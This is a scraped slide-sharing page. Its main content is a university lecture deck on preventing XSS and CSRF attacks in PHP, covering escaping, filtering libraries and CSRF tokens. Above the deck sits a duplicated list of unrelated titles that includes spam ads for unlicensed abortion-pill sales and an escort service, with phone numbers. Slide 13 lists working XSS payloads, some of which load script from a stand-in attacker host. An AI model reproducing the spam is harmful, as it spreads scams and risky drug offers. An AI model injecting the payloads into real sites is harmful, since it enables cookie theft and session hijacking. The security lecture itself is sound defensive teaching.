%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
ManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide Deck
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxBUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
 

Session7-XSS & CSRF

  • 1. Web Application Security (PHP) Zakieh Alizadeh zakiehalizadeh@gmail.com APA Laboratory – Ferdowsi University of Mashhad
  • 3. XSS & CSRF  Scenarios :  Preventing XSS and CSRF Attacks In College Library Website Table Of Content  Introduce XSS attacks o Strategies for Preventing of XSS  Introduce CSRF Attacks o Strategies For Preventing Of CSRF
  • 4. XSS & CSRF  Introduce XSS attacks  Strategies for Preventing of XSS  Introduce CSRF Attacks  Strategies For Preventing Of CSRF
  • 5. XSS Introuduce Cross-site Scripting (XSS)  XSS enables attackers to inject client-side script into Web pages viewed by other users.  In a typical XSS attack the hacker infects a legitimate web page with his malicious client-side script. When a user visits this web page the script is downloaded to his browser and executed.  Note : Often people refer to Cross Site Scripting as CSS or XSS, which is can be confused with Cascading Style Sheets (CSS).
  • 6. XSS Cross-site Scripting (XSS)  Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might o compromise private information o manipulate or steal cookies o create requests that can be mistaken for those of a valid user o execute malicious code on the end-user systems.
  • 7. XSS Type  There is no single, standardized classification of cross-site scripting flaws, but most experts distinguish between at least two primary flavors of XSS: o Non-persistent o Persistent o DOM-Based
  • 8. XSS Non-persistent  These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the request.
  • 9. XSS Persistent  The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping.
  • 10. XSS  DOM-Based XSS Vulnerabilities  Both reflected and stored XSS vulnerabilities involve a specific pattern of behavior, in which the application takes user-controllable data and displays this back to users in an unsafe way. A third category of XSS vulnerabilities does not share this characteristic. Here, the process by which the attacker’s  JavaScript gets executed is as follows: o A user requests a crafted URL supplied by the attacker and containing embedded JavaScript. o The server’s response does not contain the attacker’s script in any form. o When the user’s browser processes this response, the script is executed nonetheless.
  • 11. XSS XSS Pattern  There are many slight variations to this XSS attack, however all XSS attacks follow this pattern, which is depicted in the diagram below.
  • 12. XSS  Cross-site Scripting (XSS)  In the pie-chart below, created by the Web Hacking Incident Database for 2011 (WHID)
  • 13. XSS Cross-site Scripting (XSS)  what form does the data come? Tag Code <SCRIPT> <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> <SCRIPT> alert(“XSS”); </SCRIPT> <BODY> <BODY ONLOAD=alert("XSS")> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG> <IMG SRC="javascript:alert('XSS');"> <IFRAME> <IFRAME SRC=”http://hacker-site.com/xss.html”> <INPUT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');“>
  • 14. XSS  Sanitization  Sanitization is type of Approaches to Input Handling .  Sometimes accept data that cannot be guaranteed as safe. Instead of rejecting this input, the application sanitizes it in various ways to prevent it from having any adverse effects.  Potentially malicious characters may be: o removed from the data altogether o leaving only what is known to be safe o suitably encoded or “escaped” before further processing is performed
  • 15. XSS & CSRF  Introduce XSS attacks  Strategies for Preventing of XSS  Introduce CSRF Attacks  Strategies For Preventing Of CSRF
  • 16. XSS Preventing XSS Attacks  Filtering for XSS  Escaping from XSS
  • 17. XSS  Filtering for XSS  filter which will remove dangerous keywords, such as the infamous <SCRIPT> tag, JavaScript commands, CSS styles and other dangerous HTML markup (such as those that contain event handlers.)  Many web developers choose to implement their own filtering mechanisms; they usually write server-side code.(black list)  hackers usually have more experience than the web developers, and often manage to circumvent simple filters by using techniques such as hex encoding, unicode character variations, line breaks and null characters in strings.  recommended to use some sort of library that has been tried and tested by the community at large.
  • 18. XSS  Filtering for XSS  PHP boasts a more comprehensive library called HTML Purifier which licensed as Open Source and can be customised depending on your needs. HTML Purifier also boasts strict standards compliance and better features than other filters.  Another interesting library you can use is HTML Markdown which converts text from your users into standard and clean XHTML. This gives the advantage that minimal HTML Markup can exist in your user's input (such as bold, underline and colours). HTML Markdown is a Perl library and does not explicitly advertise XSS prevention features so it probably should not be your only line of defence.
  • 19. XSS Filtering for XSS  PHP Functions : o filter_var () o strip_tags() o htmlentities()
  • 20. XSS  Escaping from XSS  This is the primary means to disable an XSS attack. When performing Escaping you are effectively telling the browser that the data you are sending should be treated as data and should not be interpreted in any other way.  Escaping has been used to construct this article. I have managed to bring many scripts into your browser, but none of these scripts has executed! The technique used to do that is called, escaping, or as the W3C calls it “Character Escaping”.  In HTML you can escape dangerous characters by using the &# sequence followed by the it’s character code.  An escaped < character looks like this: &#60. The > character is escaped like this: &#62.
  • 21. XSS  Sanitization  Example o For example, the usual defense against cross-site scripting attacks is to HTML-encode dangerous characters before these are embedded into pages of the application code char &apos ; “ &amp ; ‘ &lt ; < & gt ; >
  • 22. XSS Escaping from XSS  PHP Functions : o Htmlspecialchars()
  • 23. XSS & CSRF  Introduce XSS attacks  Strategies for Preventing of XSS  Introduce CSRF Attacks  Strategies For Preventing Of CSRF
  • 24. CSRF Introduction  Cross-Site Request Forgery, or CSRF for short is a common and regular online attack is. CSRF also goes by the acronym XSRF and the phrase Sea- Surf.  CSRF attacks include a malicious exploit of a website in which a user will transmit malicious requests that the target website trusts without the user’s consent.  In Cross-Site Scripting (XSS), the attacker exploits the trust a user has for a website, with CSRF on the other hand, the attacker exploits the trust a website has against a user’s browser.
  • 25. CSRF Introduction 1. You visit 'good site' A, where you log-in and get a cookie to identify your session. 2. You leave site A, but forget to close your open session. 3. You visit 'bad site' B, where there is a malicious GET request hidden as an IMG. 4. Now, you are inadvertly executing an acction on site A, using the credentials from the cookie generated when you visited site A.
  • 27. XSS & CSRF  Introduce XSS attacks  Strategies for Preventing of XSS  Introduce CSRF Attacks  Strategies For Preventing Of CSRF
  • 28. CSRF Prevention Measures That Do NOT Work  Using a Secret Cookie  Only Accepting POST Requests  Multi-Step Transactions  URL Rewriting
  • 29. CSRF Prevention Measure :Token Pattern  A prevention measure could be the implementation and inclusion of tokens in a user’s (current) session.  Tokens are long cryptographic values that are difficult to guess. These will be generated when a user’s session begins and will be associated with this particular user’s session.  This challenge token will be included in each request, which will be used by the server side to verify the legitimacy of the end-user’s request.
  • 30. CSRF  More Recommendation : Synchronizer Token Pattern  Checking The Referer Header  Challenge-Response o CAPTCHA o Re-Authentication (password)  Client/User Prevention o Logoff immediately after using a Web application o Do not allow your browser to save username/passwords o Do not use the same browser to access sensitive applications and to surf the Internet freely (tabbed browsing)
  • 31. CSRF  Vulnerable Patterns for CSRF  Any application that accepts HTTP requests from an authenticated user without having some control to verify that the HTTP request is unique to the user's session.  By checking the page rendering we need to see if any unique identifiers are appended to the links rendered by the application in the user's browser. If there is no unique identifier relating to each HTTP request to tie a HTTP request to the user, we are vulnerable. Session ID is not enough, as the session ID shall be sent anyway if a user clicks on a rogue link, as the user is authenticated already.